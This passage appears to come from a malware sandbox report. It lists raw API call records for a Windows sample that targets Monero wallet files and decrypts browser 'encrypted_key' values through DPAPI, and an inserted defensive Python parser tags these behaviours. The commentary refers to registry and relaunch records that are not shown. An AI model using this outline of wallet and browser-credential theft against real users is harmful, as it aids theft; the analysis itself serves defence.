                  • Instruction ID: d880893fca0aec46f3ce3f8fc5294dadc319f24a0ee006df4b952ccda47e8dc3
                  • Opcode Fuzzy Hash: 3c3b1dd03e3ea7ec1e150a698e66982fd761af5a3bcc44a51ab3b9472dc17f2c
                  • Instruction Fuzzy Hash: 5AE0E675A50208BFD714DB94DD09E5977B8FB44702F114154FD0A97280D9B16E109F56
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 0062A3FF
                  • lstrlen.KERNEL32(00000000), ref: 0062A6BC
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 0062A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 5ff4eaf036a879b510ffd5a048124e18f709dc711d62d1d8197a0bfd0f4ad3d6
                  • Instruction ID: 3afe9c588bc2aec9a9e7571d9021f4f3ad3aa771223c3b225b1f8c112ab8d5a9
                  • Opcode Fuzzy Hash: 5ff4eaf036a879b510ffd5a048124e18f709dc711d62d1d8197a0bfd0f4ad3d6
                  • Instruction Fuzzy Hash: B5E12072810108ABCB48FBE4DC92EEE733AAF14300F51815DF55776091EF706A49DBAA
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062D481
                  • lstrlen.KERNEL32(00000000), ref: 0062D698
                  • lstrlen.KERNEL32(00000000), ref: 0062D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 0062D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 786e5c7702a348f1902154c0862b0f5795ecb7f858fb8204db61552b3ca34f50
                  • Instruction ID: 7101fc1ed2142a4933c0c249307c86f42ee3a5166f42f7852813d3a27246530d
                  • Opcode Fuzzy Hash: 786e5c7702a348f1902154c0862b0f5795ecb7f858fb8204db61552b3ca34f50
                  • Instruction Fuzzy Hash: 4D910372810108AADB44FBE0DD96EEE733AAF14300F51416CF54776091EF746A09DBEA
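The function records above are raw API listings, and the same three routines recur: a heap-allocate-then-RegOpenKeyExA/RegQueryValueExA/RegCloseKey value read (call sites 00637E5E and 006212D7), a CopyFileA followed by DeleteFileA in a function whose subcalls build a path ending in \Monero\wallet.keys (0062A2E1/0062A743, 0062D481/0062D72B, 0062D801/0062DA32), and a GetModuleFileNameA / ShellExecuteEx / ExitProcess sequence (00636663 onward). The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses lines in this record format, decodes the RegOpenKeyExA hive handle and access mask (0x80000002 is HKEY_LOCAL_MACHINE; 0x00020119 is KEY_READ plus KEY_WOW64_64KEY, i.e. a 32-bit process asking for the 64-bit registry view), and tags each record with a coarse behaviour. The sample inputs are lines copied from the records above; the tag names and the rules that produce them are this example's own heuristics, not anything the sandbox emits.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Shape of the "APIs" lines in a Joe Sandbox function record, e.g.
#   • RegOpenKeyExA.ADVAPI32(80000002,0130C2F8,00000000,00020119,?), ref: 00637E5E
#   • wsprintfA.USER32 ref: 006392C7
#     • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,...), ref: 0063A9C5
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument text; "?" means the sandbox could not resolve it
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when the line came from "Part of subcall function"

def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("mod"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)

def parse_block(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]

# Registry constants from winreg.h / winnt.h.
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
              0x80000005: "HKEY_CURRENT_CONFIG"}
KEY_READ = 0x20019   # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
ACCESS_BITS = [(0x20000, "STANDARD_RIGHTS_READ"), (0x1, "KEY_QUERY_VALUE"),
               (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
               (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"),
               (0x20, "KEY_CREATE_LINK"), (0x100, "KEY_WOW64_64KEY"),
               (0x200, "KEY_WOW64_32KEY")]

def _hex(s: str) -> Optional[int]:
    try:
        return int(s, 16)
    except ValueError:       # "?" or other unresolved text from the sandbox
        return None

def decode_reg_open(call: ApiCall) -> Dict[str, object]:
    """RegOpenKeyExA(hKey, lpSubKey, ulOptions, samDesired, phkResult): name the hive and rights.
    Values that are not a predefined hive (or are "?") are passed through unchanged, not guessed."""
    if len(call.args) < 4:
        return {"hive": "?", "rights": []}
    hkey, sam = _hex(call.args[0]), _hex(call.args[3])
    hive = HKEY_NAMES.get(hkey, call.args[0]) if hkey is not None else call.args[0]
    rights: List[str] = []
    if sam is not None:
        if (sam & KEY_READ) == KEY_READ:   # name the composite right once, then any extra bits
            rights.append("KEY_READ")
            sam &= ~KEY_READ
        rights += [name for bit, name in ACCESS_BITS if sam & bit]
    return {"hive": hive, "rights": rights}

def summarize(calls: List[ApiCall]) -> List[str]:
    """Coarse behaviour tags for one record (heuristics of this example, not the sandbox's)."""
    names = {c.api for c in calls}
    tags: List[str] = []
    for c in calls:
        if c.api == "RegOpenKeyExA" and c.subcall is None and "RegQueryValueExA" in names:
            d = decode_reg_open(c)
            tags.append(f"registry-read:{d['hive']}:{'|'.join(d['rights'])}")
    if any("wallet" in a.lower() for c in calls for a in c.args):
        tags.append("wallet-path-string")
    if {"CopyFileA", "DeleteFileA"} <= names:
        tags.append("file-copy-then-delete")
    if {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"} <= names:
        tags.append("self-relaunch-then-exit")
    return tags

# Sample inputs: lines copied from the function records in this report.
SAMPLE_REGISTRY = """
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00637E37
• RegOpenKeyExA.ADVAPI32(80000002,0130C2F8,00000000,00020119,?), ref: 00637E5E
• RegQueryValueExA.ADVAPI32(?,0131ECD0,00000000,00000000,000000FF,000000FF), ref: 00637E7F
• RegCloseKey.ADVAPI32(?), ref: 00637E92
"""
SAMPLE_WALLET = """
  • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\\Monero\\wallet.keys,00640E17), ref: 0063A9C5
  • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062A2E1
• lstrlen.KERNEL32(00000000,00000000), ref: 0062A3FF
• DeleteFileA.KERNEL32(00000000), ref: 0062A743
"""
SAMPLE_RELAUNCH = """
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00636663
• ShellExecuteEx.SHELL32(0000003C), ref: 00636726
• ExitProcess.KERNEL32 ref: 00636755
"""

if __name__ == "__main__":
    for name, text in (("registry", SAMPLE_REGISTRY), ("wallet", SAMPLE_WALLET), ("relaunch", SAMPLE_RELAUNCH)):
        print(name, summarize(parse_block(text)))
```

The decoder deliberately does not interpret arguments the sandbox left unresolved: the second registry routine (006212D7) records its hKey as 000000FF and its subkey as ?, so it comes back as a literal 000000FF rather than a hive name. Treat tags as triage hints to be confirmed in the disassembly, not as detections.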
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062D801
                  • lstrlen.KERNEL32(00000000), ref: 0062D99F
                  • lstrlen.KERNEL32(00000000), ref: 0062D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 0062DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 4f6994530ecab0df4bac6805bfc127ab4c34b2654fe738838d8c9f6c5df0ccff
                  • Instruction ID: d17450f8f2945bf86e2cda8574f04677d679a41a434dd0e9453fee1db5793689
                  • Opcode Fuzzy Hash: 4f6994530ecab0df4bac6805bfc127ab4c34b2654fe738838d8c9f6c5df0ccff
                  • Instruction Fuzzy Hash: 1181F172910118AADB44FBE0DC96EEE733ABF14300F51412CF546B6191EF746A09EBE6
                  Strings
                  • sc, xrefs: 006372AE, 00637179, 0063717C
                  • sc, xrefs: 00637111
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0063718C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: sc$sc$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-90809162
                  • Opcode ID: 184041814eaceeda6a535c753091de55f43789b87a1918ce8c44324c70f66018
                  • Instruction ID: 211135bf4b1e39dd681be9b8649bacdc069c7f8f3569a40e84f73b4f80efff58
                  • Opcode Fuzzy Hash: 184041814eaceeda6a535c753091de55f43789b87a1918ce8c44324c70f66018
                  • Instruction Fuzzy Hash: 6C517CB1C04219AFDB64EB90DC95BEEB376AF44304F1440ACE61577281EB746E88DF98
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 5dcc6f1dc39ae122c5036426fd0ff493a87d21c904455d3f6902c96295f15f3c
                  • Instruction ID: 8e74b98c91c7e124d4ef3117284a44e2fe8cd7b26cc1d7c22dc67889067173ec
                  • Opcode Fuzzy Hash: 5dcc6f1dc39ae122c5036426fd0ff493a87d21c904455d3f6902c96295f15f3c
                  • Instruction Fuzzy Hash: 2C414FB5D10119AFDB04EFE4D886AEEB776AB44304F008418F51277391DB74AA09DFE5
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 006299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006299EC
                    • Part of subcall function 006299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00629A11
                    • Part of subcall function 006299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00629A31
                    • Part of subcall function 006299C0: ReadFile.KERNEL32(000000FF,?,00000000,0062148F,00000000), ref: 00629A5A
                    • Part of subcall function 006299C0: LocalFree.KERNEL32(0062148F), ref: 00629A90
                    • Part of subcall function 006299C0: CloseHandle.KERNEL32(000000FF), ref: 00629A9A
                    • Part of subcall function 00638E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00638E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D39
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629AEF
                    • Part of subcall function 00629AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00624EEE,00000000,?), ref: 00629B01
                    • Part of subcall function 00629AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nb,00000000,00000000), ref: 00629B2A
                    • Part of subcall function 00629AC0: LocalFree.KERNEL32(?,?,?,?,00624EEE,00000000,?), ref: 00629B3F
                    • Part of subcall function 00629B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00629B84
                    • Part of subcall function 00629B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00629BA3
                    • Part of subcall function 00629B60: LocalFree.KERNEL32(?), ref: 00629BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: b077be8e05a7d7e77dde83d755c2e87fb4542f0ddbe4b707530689d09fb0d477
                  • Instruction ID: 379cae387d7249451346ba62e767fdc6d252106b7e77d9b72a2d934b1d20fae9
                  • Opcode Fuzzy Hash: b077be8e05a7d7e77dde83d755c2e87fb4542f0ddbe4b707530689d09fb0d477
                  • Instruction Fuzzy Hash: FC3150B5D00619ABCF04DBE4DC85BEFB7BAAF88300F144518E901A7241E7309A44CBA5
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006405B7), ref: 006386CA
                  • Process32First.KERNEL32(?,00000128), ref: 006386DE
                  • Process32Next.KERNEL32(?,00000128), ref: 006386F3
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • CloseHandle.KERNEL32(?), ref: 00638761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 46d5be12793157f14937bd7c95c77fbd845522a0451731889064be0d54697027
                  • Instruction ID: 6e96bb3c30ae5c6793f5e6338dbbc2ec29d500cfcc98ae863915edcc5d3772f3
                  • Opcode Fuzzy Hash: 46d5be12793157f14937bd7c95c77fbd845522a0451731889064be0d54697027
                  • Instruction Fuzzy Hash: A9313971901218ABCB68DF94DC85FEEB77AFB45700F1041A9F50AA22A0DB706A45CFE1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00640E00,00000000,?), ref: 006379B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 006379B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00640E00,00000000,?), ref: 006379C4
                  • wsprintfA.USER32 ref: 006379F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 272c53418e5d72c7a04979fed0a7df0e7cf3358ba916ab00d0602f91b77f5f12
                  • Instruction ID: debc01a4a955f313af9f0a9a66f9714b58545ec06347be2aedda30e37a39996d
                  • Opcode Fuzzy Hash: 272c53418e5d72c7a04979fed0a7df0e7cf3358ba916ab00d0602f91b77f5f12
                  • Instruction Fuzzy Hash: 6E11F7B2904118ABCB18DFD9DD45BBEB7F8FB4CB11F11425AF605A2280E6795940CBB1
                  APIs
                  • __getptd.LIBCMT ref: 0063C74E
                    • Part of subcall function 0063BF9F: __amsg_exit.LIBCMT ref: 0063BFAF
                  • __getptd.LIBCMT ref: 0063C765
                  • __amsg_exit.LIBCMT ref: 0063C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0063C797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 8042fcf350f566052d202cefd46b382687e1b15489caf565bfd67f01ec594e6a
                  • Instruction ID: 62ee3bb05f7e69cc759afc463822ddfcb685c063514583a16755a61919cddb44
                  • Opcode Fuzzy Hash: 8042fcf350f566052d202cefd46b382687e1b15489caf565bfd67f01ec594e6a
                  • Instruction Fuzzy Hash: 16F06D329047009BD7A1BFB89807B9933A3AF00720F20614DF904B62D2CB6459419FDE
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634F7A
                  • lstrcat.KERNEL32(?,00641070), ref: 00634F97
                  • lstrcat.KERNEL32(?,01318F40), ref: 00634FAB
                  • lstrcat.KERNEL32(?,00641074), ref: 00634FBD
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 0063492C
                    • Part of subcall function 00634910: FindFirstFileA.KERNEL32(?,?), ref: 00634943
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                    • Part of subcall function 00634910: FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                    • Part of subcall function 00634910: FindClose.KERNEL32(000000FF), ref: 00634B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: aa85c8711c937b3b685d7f8a8ac3aa2a07ab9000bf585b8c8284153754dec734
                  • Instruction ID: 9f482866ae096840fd45695dd3e480225b00cf835e0c2ffb15cdeba38eafb2e0
                  • Opcode Fuzzy Hash: aa85c8711c937b3b685d7f8a8ac3aa2a07ab9000bf585b8c8284153754dec734
                  • Instruction Fuzzy Hash: E321B8B69002046BC794F7B0EC46EED733DBB54700F014558F65AA7181EEB596C88FD6